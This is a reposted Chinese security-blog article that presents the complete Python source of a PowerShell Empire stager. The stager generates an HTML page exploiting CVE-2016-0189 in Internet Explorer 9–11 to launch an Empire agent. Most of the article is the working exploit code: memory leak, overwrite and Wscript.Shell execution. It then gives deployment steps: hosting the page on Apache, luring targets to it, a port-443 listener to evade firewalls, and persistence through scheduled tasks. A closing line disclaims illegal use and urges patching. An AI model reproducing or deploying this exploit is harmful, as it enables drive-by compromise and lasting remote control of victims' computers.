![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsIyZuBnLwY2YyIjZzQTZ2M2YiN2M3MTN5kzMmdDOzADZ2MTMlVzLchTM5AjNxAjMvwFZh9GbwV3Lc52Yu0mcwcHbp1mL3d3dvw1LcpDc0RHaiojIsJye.png)
前言
Empire(http://www.powershellempire.com/)是一個PowerShell後期漏洞利用代理工具,它建立在密碼學、安全通信和靈活的架構之上。Empire實作了無需powershell.exe就可運作PowerShell代理的功能,它可以快速部署後期漏洞利用子產品,并且能夠躲避網絡檢測。
是以,Powershell Empire是我們最喜歡的一款工具,尤其是當目标使用者在我們的活動範圍内時。我們通常使用Metasploit和Empire的組合來完成工作,即結合浏覽器漏洞利用和Empire内的标準操作進行。
不過,在最近的一個測試中,我們沒有使用MSF,而是使用了Empire中的一個新stager,該stager能夠利用漏洞CVE-2016-0189(也稱為vbscript_godmod,是一個 IE 遊覽器的腳本引擎漏洞)來攻擊目标使用者的IE浏覽器(Internet explorer 9-11)。這是近6個月以來我們的首選利用,而且最近我們已經開始開發利用工具。如果成功的話,可以在保證硬碟資料不丢失的情況下啟動powershell,同時将代理連接配接到Empire。
利用Powershell Empire和CVE-2016-0189攻擊使用者的IE浏覽器
下面是該新stager的Python代碼ms16.py:
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'MS16-051 IE RCE',
'Author': ['www.cgsec.co.uk'],
'Description': ('Leverages MS16-051 to execute powershell in unpatched browsers. This is a file-less vector which works on IE9/10/11 and all versions of Windows'),
'Comments': [
'Target will have to open link with vulnerable version of IE.'
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
},
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting.',
'Required' : False,
'Value' : '0'
},
'OutFile' : {
'Description' : 'File to output HTML to, otherwise displayed on the screen.',
'Required' : True,
'Value' : ''
},
'Base64' : {
'Description' : 'Switch. Base64 encode the powershell output.',
'Required' : True,
'Value' : 'True'
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
listenerName = self.options['Listener']['Value']
base64 = self.options['Base64']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
encode = False
if base64.lower() == "true":
encode = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=encode, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
code = "<html>\n"
code += "<head>\n"
code += "<meta http-equiv=\"x-ua-compatible\" content=\"IE=10\">\n"
code += "</head>\n"
code += "<body>\n"
code += " <script type=\"text/vbscript\">\n"
code += " Dim aw\n"
code += " Dim plunge(32)\n"
code += " Dim y(32)\n"
code += " prefix = \"%u4141%u4141\"\n"
code += " d = prefix & \"%u0016%u4141%u4141%u4141%u4242%u4242\"\n"
code += " b = String(64000, \"D\")\n"
code += " c = d & b\n"
code += " x = UnEscape(c)\n"
code += " \n"
code += " Class ArrayWrapper\n"
code += " Dim A()\n"
code += " Private Sub Class_Initialize\n"
code += " ReDim Preserve A(1, 2000)\n"
code += " End Sub\n"
code += " \n"
code += " Public Sub Resize()\n"
code += " ReDim Preserve A(1, 1)\n"
code += " End Sub\n"
code += " End Class\n"
code += " \n"
code += " Class Dummy\n"
code += " End Class\n"
code += " \n"
code += " Function getAddr (arg1, s)\n"
code += " aw = Null\n"
code += " Set aw = New ArrayWrapper\n"
code += " \n"
code += " For i = 0 To 32\n"
code += " Set plunge(i) = s\n"
code += " Next\n"
code += " \n"
code += " Set aw.A(arg1, 2) = s\n"
code += " \n"
code += " Dim addr\n"
code += " Dim i\n"
code += " For i = 0 To 31\n"
code += " If Asc(Mid(y(i), 3, 1)) = VarType(s) Then\n"
code += " addr = strToInt(Mid(y(i), 3 + 4, 2))\n"
code += " End If\n"
code += " y(i) = Null\n"
code += " Next\n"
code += " \n"
code += " If addr = Null Then\n"
code += " document.location.href = document.location.href\n"
code += " Return\n"
code += " End If\n"
code += " getAddr = addr\n"
code += " End Function\n"
code += " \n"
code += " Function leakMem (arg1, addr)\n"
code += " d = prefix & \"%u0008%u4141%u4141%u4141\"\n"
code += " c = d & intToStr(addr) & b\n"
code += " x = UnEscape(c)\n"
code += " \n"
code += " aw = Null\n"
code += " Set aw = New ArrayWrapper\n"
code += " \n"
code += " Dim o\n"
code += " o = aw.A(arg1, 2)\n"
code += " \n"
code += " leakMem = o\n"
code += " End Function\n"
code += " \n"
code += " Sub overwrite (arg1, addr)\n"
code += " d = prefix & \"%u400C%u0000%u0000%u0000\"\n"
code += " c = d & intToStr(addr) & b\n"
code += " x = UnEscape(c)\n"
code += " \n"
code += " aw = Null\n"
code += " Set aw = New ArrayWrapper\n"
code += " \n"
code += " \n"
code += " aw.A(arg1, 2) = CSng(0)\n"
code += " End Sub\n"
code += " \n"
code += " Function exploit (arg1)\n"
code += " Dim addr\n"
code += " Dim csession\n"
code += " Dim olescript\n"
code += " Dim mem\n"
code += " \n"
code += " \n"
code += " Set dm = New Dummy\n"
code += " \n"
code += " addr = getAddr(arg1, dm)\n"
code += " \n"
code += " mem = leakMem(arg1, addr + 8)\n"
code += " csession = strToInt(Mid(mem, 3, 2))\n"
code += " \n"
code += " mem = leakMem(arg1, csession + 4)\n"
code += " olescript = strToInt(Mid(mem, 1, 2))\n"
code += " overwrite arg1, olescript + &H174\n"
code += " Set Object = CreateObject(\"Wscript.Shell\")\n"
code += " Object.run(\""
code += launcher + "\")\n"
code += " End Function\n"
code += " \n"
code += " Function triggerBug\n"
code += " aw.Resize()\n"
code += " Dim i\n"
code += " For i = 0 To 32\n"
code += " ' 24000x2 + 6 = 48006 bytes\n"
code += " y(i) = Mid(x, 1, 24000)\n"
code += " Next\n"
code += " End Function\n"
code += " </script>\n"
code += " \n"
code += " <script type=\"text/javascript\">\n"
code += " function strToInt(s)\n"
code += " {\n"
code += " return s.charCodeAt(0) | (s.charCodeAt(1) << 16);\n"
code += " }\n"
code += " function intToStr(x)\n"
code += " {\n"
code += " return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);\n"
code += " }\n"
code += " var o;\n"
code += " o = {\"valueOf\": function () {\n"
code += " triggerBug();\n"
code += " return 1;\n"
code += " }};\n"
code += " setTimeout(function() {exploit(o);}, 50);\n"
code += " </script>\n"
code += "</body>\n"
code += "</html>"
return code
接下來,我們就對這個新的利用做一個簡單的介紹:
首先,我們需要獲得Empire,可以從Github上下載下傳,下載下傳位址為:
https://github.com/PowerShellEmpire/Empire
接下來,我們需要安裝Apache2,它可以把索引頁直接導向/var/www/html。這一步是可選的,因為大多數人可能想要改變輸出,用于其他利用或者逃避檢測。
然後,添加我們的新stager,它位于/lib/stagers下,運作Empire的install.sh腳本來啟動并運作它。如果你是在Ubuntu上進行操作,那麼在運作該腳本之前你需要手動安裝pip。
在做好前面的準備工作之後,我們就可以啟動Empire了。
如果一切正常的話,我們應該能夠使用“stager ms16”。本文隻是簡單地将輸出檔案設定到/var/www/html/index.html,然後引導目标到該html頁面,如下圖所示。
進階一些的使用者可能想為不同的使用者建立一些更複雜的服務或躲避檢測機制,不過這超出了本文的範圍,本文隻是做出一個簡單的介紹。
此外,我還設定了一個對端口443的偵聽器,希望繞過某些防火牆和逃避一些檢測機制。
最後,當有人使用一個含有漏洞CVE-2016-0189的IE浏覽器通路你的伺服器時,該利用就會觸發,你就會得到一個新的Empire代理。另外,使用持久性子產品建立一個計劃任務可以確定不會在重新開機之後失去通路權限。這些可以通過将代理設定為自動運作來實作。
最後聲明,本文隻是提供了一個利用的簡單介紹,僅供安全學習,禁止非法使用!
也提醒使用者抓緊時間對IE浏覽器進行漏洞修複,微軟已經釋出了CVE-2016-0189漏洞的修複更新檔。
轉自:http://www.milw0rm.cn/Article/hacker/20160918/414.html